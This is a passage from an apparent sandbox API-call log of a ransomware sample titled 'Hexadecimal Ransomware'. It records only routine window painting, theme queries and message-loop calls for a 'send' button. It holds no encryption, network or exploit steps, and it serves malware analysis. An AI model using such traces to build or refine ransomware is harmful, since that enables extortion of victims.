(region=0x6e1a090) returned 0x0 [0214.427] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe518) returned 0x0 [0214.428] GetCurrentObject (hdc=0x8a01082e, type=0x1) returned 0xb00017 [0214.428] GetCurrentObject (hdc=0x8a01082e, type=0x2) returned 0x900010 [0214.428] GetCurrentObject (hdc=0x8a01082e, type=0x7) returned 0xb050815 [0214.428] GetCurrentObject (hdc=0x8a01082e, type=0x6) returned 0x8a01c2 [0214.428] SaveDC (hdc=0x8a01082e) returned 1 [0214.428] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2504081c [0214.428] GetClipRgn (hdc=0x8a01082e, hrgn=0x2504081c) returned 0 [0214.428] SelectClipRgn (hdc=0x8a01082e, hrgn=0x39040825) returned 2 [0214.428] DeleteObject (ho=0x2504081c) returned 1 [0214.428] DeleteObject (ho=0x39040825) returned 1 [0214.428] OffsetViewportOrgEx (in: hdc=0x8a01082e, x=0, y=0, lppt=0x334fe2c | out: lppt=0x334fe2c) returned 1 [0214.428] DrawThemeParentBackground () returned 0x0 [0214.428] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe1dc | out: lpwndpl=0x11fe1dc) returned 1 [0214.429] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe188 | out: lpRect=0x11fe188) returned 1 [0214.429] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0214.429] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0214.429] GetSystemMetrics (nIndex=42) returned 0 [0214.429] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe030, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0214.429] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe030) returned 0x16 [0214.429] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe090 | out: lpRect=0x11fe090) returned 1 [0214.429] GetCurrentObject (hdc=0x8a01082e, type=0x1) returned 0xb00017 [0214.429] GetCurrentObject (hdc=0x8a01082e, type=0x2) returned 0x900010 [0214.429] GetCurrentObject (hdc=0x8a01082e, type=0x7) returned 0xb050815 [0214.429] GetCurrentObject (hdc=0x8a01082e, type=0x6) returned 0x8a01c2 [0214.429] SaveDC (hdc=0x8a01082e) returned 2 [0214.429] GetNearestColor (hdc=0x8a01082e, color=0x0) returned 0x0 [0214.430] CreateSolidBrush (color=0x0) returned 0x25100826 [0214.430] FillRect (hDC=0x8a01082e, lprc=0x11fdf30, hbr=0x25100826) returned 1 [0214.430] DeleteObject (ho=0x25100826) returned 1 [0214.430] RestoreDC (hdc=0x8a01082e, nSavedDC=-1) returned 1 [0214.430] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0214.430] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0214.430] GetSystemMetrics (nIndex=42) returned 0 [0214.430] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0214.430] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0214.430] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe030 | out: lpRect=0x11fe030) returned 1 [0214.430] GetCurrentObject (hdc=0x8a01082e, type=0x1) returned 0xb00017 [0214.430] GetCurrentObject (hdc=0x8a01082e, type=0x2) returned 0x900010 [0214.430] GetCurrentObject (hdc=0x8a01082e, type=0x7) returned 0xb050815 [0214.430] GetCurrentObject (hdc=0x8a01082e, type=0x6) returned 0x8a01c2 [0214.431] SaveDC (hdc=0x8a01082e) returned 2 [0214.431] GetNearestColor (hdc=0x8a01082e, color=0x0) returned 0x0 [0214.431] CreateSolidBrush (color=0x0) returned 0x26100826 [0214.431] FillRect (hDC=0x8a01082e, lprc=0x11fded0, hbr=0x26100826) returned 1 [0214.431] DeleteObject (ho=0x26100826) returned 1 [0214.431] RestoreDC (hdc=0x8a01082e, nSavedDC=-1) returned 1 [0214.431] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0214.431] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0214.431] GetSystemMetrics (nIndex=42) returned 0 [0214.431] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0214.431] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0214.432] RestoreDC (hdc=0x8a01082e, nSavedDC=-1) returned 1 [0214.432] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8a01082e) returned 0x0 [0214.432] IsAppThemed () returned 0x1 [0214.432] GetThemeAppProperties () returned 0x3 [0214.432] GetThemeAppProperties () returned 0x3 [0214.432] IsAppThemed () returned 0x1 [0214.432] GetThemeAppProperties () returned 0x3 [0214.432] GetThemeAppProperties () returned 0x3 [0214.432] IsThemePartDefined () returned 0x1 [0214.432] GdipCreateRegion (region=0x11fe454) returned 0x0 [0214.432] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0214.432] GdipCreateMatrix (matrix=0x11fe454) returned 0x0 [0214.432] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a0f0) returned 0x0 [0214.432] GdipIsMatrixIdentity (matrix=0x6e1a0f0, result=0x11fe46c) returned 0x0 [0214.432] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0214.432] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593c38) returned 0x0 [0214.432] LocalFree (hMem=0x1593c38) returned 0x0 [0214.432] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0214.432] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593c38) returned 0x0 [0214.432] LocalFree (hMem=0x1593c38) returned 0x0 [0214.433] GdipDeleteMatrix (matrix=0x6e1a0f0) returned 0x0 [0214.433] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe494) returned 0x0 [0214.433] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe484) returned 0x0 [0214.433] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe484) returned 0x0 [0214.433] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0214.433] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe49c) returned 0x0 [0214.433] GetCurrentObject (hdc=0x8a01082e, type=0x1) returned 0xb00017 [0214.433] GetCurrentObject (hdc=0x8a01082e, type=0x2) returned 0x900010 [0214.433] GetCurrentObject (hdc=0x8a01082e, type=0x7) returned 0xb050815 [0214.433] GetCurrentObject (hdc=0x8a01082e, type=0x6) returned 0x8a01c2 [0214.433] SaveDC (hdc=0x8a01082e) returned 1 [0214.433] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3a040825 [0214.433] GetClipRgn (hdc=0x8a01082e, hrgn=0x3a040825) returned 0 [0214.433] SelectClipRgn (hdc=0x8a01082e, hrgn=0x2704081c) returned 2 [0214.433] DeleteObject (ho=0x3a040825) returned 1 [0214.433] DeleteObject (ho=0x2704081c) returned 1 [0214.433] OffsetViewportOrgEx (in: hdc=0x8a01082e, x=0, y=0, lppt=0x33507ec | out: lppt=0x33507ec) returned 1 [0214.433] IsAppThemed () returned 0x1 [0214.434] GetThemeAppProperties () returned 0x3 [0214.434] GetThemeAppProperties () returned 0x3 [0214.434] DrawThemeBackground () returned 0x0 [0214.434] RestoreDC (hdc=0x8a01082e, nSavedDC=-1) returned 1 [0214.434] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8a01082e) returned 0x0 [0214.434] GdipCreateRegion (region=0x11fe458) returned 0x0 [0214.434] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0214.434] GdipCreateMatrix (matrix=0x11fe458) returned 0x0 [0214.434] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0214.434] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe470) returned 0x0 [0214.434] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0214.435] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593c38) returned 0x0 [0214.435] LocalFree (hMem=0x1593c38) returned 0x0 [0214.435] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0214.435] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ea0) returned 0x0 [0214.435] LocalFree (hMem=0x1593ea0) returned 0x0 [0214.435] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0214.435] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe498) returned 0x0 [0214.435] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe488) returned 0x0 [0214.435] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe488) returned 0x0 [0214.435] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0214.435] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe4a0) returned 0x0 [0214.435] GetCurrentObject (hdc=0x8a01082e, type=0x1) returned 0xb00017 [0214.435] GetCurrentObject (hdc=0x8a01082e, type=0x2) returned 0x900010 [0214.435] GetCurrentObject (hdc=0x8a01082e, type=0x7) returned 0xb050815 [0214.435] GetCurrentObject (hdc=0x8a01082e, type=0x6) returned 0x8a01c2 [0214.436] SaveDC (hdc=0x8a01082e) returned 1 [0214.436] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2804081c [0214.436] GetClipRgn (hdc=0x8a01082e, hrgn=0x2804081c) returned 0 [0214.436] SelectClipRgn (hdc=0x8a01082e, hrgn=0x3b040825) returned 2 [0214.436] DeleteObject (ho=0x2804081c) returned 1 [0214.436] DeleteObject (ho=0x3b040825) returned 1 [0214.436] OffsetViewportOrgEx (in: hdc=0x8a01082e, x=0, y=0, lppt=0x3350ac0 | out: lppt=0x3350ac0) returned 1 [0214.436] IsAppThemed () returned 0x1 [0214.436] GetThemeAppProperties () returned 0x3 [0214.436] GetThemeAppProperties () returned 0x3 [0214.436] GetThemeBackgroundContentRect () returned 0x0 [0214.436] RestoreDC (hdc=0x8a01082e, nSavedDC=-1) returned 1 [0214.436] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8a01082e) returned 0x0 [0214.436] IsAppThemed () returned 0x1 [0214.436] GetThemeAppProperties () returned 0x3 [0214.436] GetThemeAppProperties () returned 0x3 [0214.436] GdipGetTextRenderingHint (graphics=0x6e19d80, mode=0x11fe5d4) returned 0x0 [0214.436] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5c0) returned 0x0 [0214.437] GetCurrentObject (hdc=0x8a01082e, type=0x1) returned 0xb00017 [0214.437] GetCurrentObject (hdc=0x8a01082e, type=0x2) returned 0x900010 [0214.437] GetCurrentObject (hdc=0x8a01082e, type=0x7) returned 0xb050815 [0214.437] GetCurrentObject (hdc=0x8a01082e, type=0x6) returned 0x8a01c2 [0214.437] SaveDC (hdc=0x8a01082e) returned 1 [0214.437] GetTextAlign (hdc=0x8a01082e) returned 0x0 [0214.437] GetTextColor (hdc=0x8a01082e) returned 0x0 [0214.437] GetCurrentObject (hdc=0x8a01082e, type=0x6) returned 0x8a01c2 [0214.437] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe308 | out: pv=0x11fe308) returned 92 [0214.437] SelectObject (hdc=0x8a01082e, h=0x170a07ff) returned 0x8a01c2 [0214.437] GetBkMode (hdc=0x8a01082e) returned 2 [0214.437] SetBkMode (hdc=0x8a01082e, mode=1) returned 2 [0214.437] DrawTextExW (in: hdc=0x8a01082e, lpchText="전송하기", cchText=4, lprc=0x11fe3f0, format=0x2415, lpdtp=0x3350e60 | out: lpchText="전송하기", lprc=0x11fe3f0) returned 13 [0214.439] DrawTextExW (in: hdc=0x8a01082e, lpchText="전송하기", cchText=4, lprc=0x11fe554, format=0x2015, lpdtp=0x3350e60 | out: lpchText="전송하기", lprc=0x11fe554) returned 13 [0214.440] RestoreDC (hdc=0x8a01082e, nSavedDC=-1) returned 1 [0214.440] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8a01082e) returned 0x0 [0214.440] GetFocus () returned 0x102d8 [0214.440] IsAppThemed () returned 0x1 [0214.441] GetThemeAppProperties () returned 0x3 [0214.441] GetThemeAppProperties () returned 0x3 [0214.441] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7a0) returned 0x0 [0214.441] BitBlt (hdc=0xf0105ee, x=0, y=0, cx=64, cy=25, hdcSrc=0x8a01082e, x1=0, y1=0, rop=0xcc0020) returned 1 [0214.441] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8a01082e) returned 0x0 [0214.441] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0214.441] SelectObject (hdc=0x8a01082e, h=0x85000f) returned 0xb050815 [0214.441] DeleteDC (hdc=0x8a01082e) returned 1 [0214.441] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0214.442] EndPaint (hWnd=0x102d8, lpPaint=0x11fe744) returned 1 [0214.442] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0214.442] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0214.442] WaitMessage () returned 1 [0214.521] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.521] GetMessageA (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.521] TranslateMessage (lpMsg=0x11fed00) returned 0 [0214.521] DispatchMessageA (lpMsg=0x11fed00) returned 0x0 [0214.521] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0214.521] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0214.522] WaitMessage () returned 1 [0214.563] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.563] IsWindowUnicode (hWnd=0x202e6) returned 1 [0214.563] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.564] TranslateMessage (lpMsg=0x11fed00) returned 0 [0214.564] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0214.565] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0214.565] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0214.565] WaitMessage () returned 1 [0214.570] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.570] IsWindowUnicode (hWnd=0x202e6) returned 1 [0214.571] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.571] TranslateMessage (lpMsg=0x11fed00) returned 0 [0214.571] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0214.573] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0214.573] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0214.573] WaitMessage () returned 1 [0214.704] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.704] IsWindowUnicode (hWnd=0x102ea) returned 1 [0214.704] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.704] TranslateMessage (lpMsg=0x11fed00) returned 0 [0214.704] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0214.705] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0214.705] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0214.705] WaitMessage () returned 1 [0214.757] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.757] IsWindowUnicode (hWnd=0x202e6) returned 1 [0214.757] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.757] TranslateMessage (lpMsg=0x11fed00) returned 0 [0214.757] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0214.759] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.759] IsWindowUnicode (hWnd=0x202e6) returned 1 [0214.759] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.759] TranslateMessage (lpMsg=0x11fed00) returned 0 [0214.759] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0214.760] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.760] IsWindowUnicode (hWnd=0x202e6) returned 1 [0214.760] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.760] TranslateMessage (lpMsg=0x11fed00) returned 0 [0214.760] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0214.760] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0214.761] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0214.761] WaitMessage () returned 1 [0214.761] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.761] IsWindowUnicode (hWnd=0x202e6) returned 1 [0214.761] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.761] TranslateMessage (lpMsg=0x11fed00) returned 0 [0214.761] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0214.763] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.763] IsWindowUnicode (hWnd=0x202e6) returned 1 [0214.763] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.763] TranslateMessage (lpMsg=0x11fed00) returned 0 [0214.763] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0214.764] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.764] IsWindowUnicode (hWnd=0x202e6) returned 1 [0214.764] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.764] TranslateMessage (lpMsg=0x11fed00) returned 0 [0214.764] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0214.764] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0214.765] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0214.765] WaitMessage () returned 1 [0219.329] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.332] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1f, wParam=0x0, lParam=0x0) returned 0x0 [0219.388] IsWindowUnicode (hWnd=0x102d8) returned 1 [0219.388] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.390] GetKeyState (nVirtKey=16) returned 0 [0219.390] GetKeyState (nVirtKey=17) returned 0 [0219.391] GetKeyState (nVirtKey=18) returned -127 [0219.391] SendMessageW (hWnd=0x102d8, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x1 [0219.391] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x1 [0219.391] GetKeyState (nVirtKey=16) returned 0 [0219.391] GetKeyState (nVirtKey=17) returned 0 [0219.391] GetKeyState (nVirtKey=18) returned -127 [0219.394] TranslateMessage (lpMsg=0x11fed00) returned 1 [0219.395] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0219.395] GetKeyState (nVirtKey=16) returned 0 [0219.395] GetKeyState (nVirtKey=17) returned 0 [0219.395] GetKeyState (nVirtKey=18) returned -127 [0219.395] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x104, wParam=0x12, lParam=0x20380001) returned 0x0 [0219.395] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.409] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe900 | out: lpwndpl=0x11fe900) returned 1 [0219.409] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x47, wParam=0x0, lParam=0x11febd4) returned 0x0 [0219.409] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0219.409] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0219.419] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0219.426] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x1c, wParam=0x0, lParam=0xf70) returned 0x0 [0219.426] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1c, wParam=0x0, lParam=0xf70) returned 0x0 [0219.426] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0219.426] GetCapture () returned 0x0 [0219.426] InvalidateRect (hWnd=0x102d8, lpRect=0x0, bErase=0) returned 1 [0219.427] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0219.430] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0219.430] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0 [0219.437] IsWindowUnicode (hWnd=0x102d8) returned 1 [0219.437] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.437] TranslateMessage (lpMsg=0x11fed00) returned 0 [0219.437] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0219.437] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.439] IsWindowUnicode (hWnd=0x102d8) returned 1 [0219.439] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0219.439] TranslateMessage (lpMsg=0x11fed00) returned 0 [0219.439] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0219.439] BeginPaint (in: hWnd=0x102d8, lpPaint=0x11fe748 | out: lpPaint=0x11fe748) returned 0x60100ce [0219.439] SelectPalette (hdc=0x60100ce, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0219.439] CreateCompatibleDC (hdc=0x60100ce) returned 0x2401081f [0219.440] SelectObject (hdc=0x2401081f, h=0xb050815) returned 0x85000f [0219.440] GdipCreateFromHDC (hdc=0x2401081f, graphics=0x11fe760) returned 0x0 [0219.441] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0219.441] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=64, height=25, combineMode=0x0) returned 0x0 [0219.441] GdipCreateMatrix (matrix=0x11fe7a8) returned 0x0 [0219.441] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0219.441] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe7c0) returned 0x0 [0219.442] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0219.442] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593ea0) returned 0x0 [0219.442] LocalFree (hMem=0x1593ea0) returned 0x0 [0219.442] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0219.442] GdipCreateRegion (region=0x11fe7a8) returned 0x0 [0219.442] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0219.442] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7b4) returned 0x0 [0219.442] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe7e0) returned 0x0 [0219.442] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd890dbd) returned 0x0 [0219.443] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0219.443] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5cc) returned 0x0 [0219.443] GetCurrentObject (hdc=0x2401081f, type=0x1) returned 0xb00017 [0219.443] GetCurrentObject (hdc=0x2401081f, type=0x2) returned 0x900010 [0219.443] GetCurrentObject (hdc=0x2401081f, type=0x7) returned 0xb050815 [0219.443] GetCurrentObject (hdc=0x2401081f, type=0x6) returned 0x8a01c2 [0219.443] SaveDC (hdc=0x2401081f) returned 1 [0219.444] GetNearestColor (hdc=0x2401081f, color=0x0) returned 0x0 [0219.444] GetNearestColor (hdc=0x2401081f, color=0x0) returned 0x0 [0219.444] GetNearestColor (hdc=0x2401081f, color=0x0) returned 0x0 [0219.444] GetNearestColor (hdc=0x2401081f, color=0x989898) returned 0x989898 [0219.444] GetNearestColor (hdc=0x2401081f, color=0x0) returned 0x0 [0219.444] GetNearestColor (hdc=0x2401081f, color=0x7f7f7f) returned 0x7f7f7f [0219.444] GetNearestColor (hdc=0x2401081f, color=0x989898) returned 0x989898 [0219.444] GetNearestColor (hdc=0x2401081f, color=0x0) returned 0x0 [0219.444] GetNearestColor (hdc=0x2401081f, color=0x0) returned 0x0 [0219.444] RestoreDC (hdc=0x2401081f, nSavedDC=-1) returned 1 [0219.444] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2401081f) returned 0x0 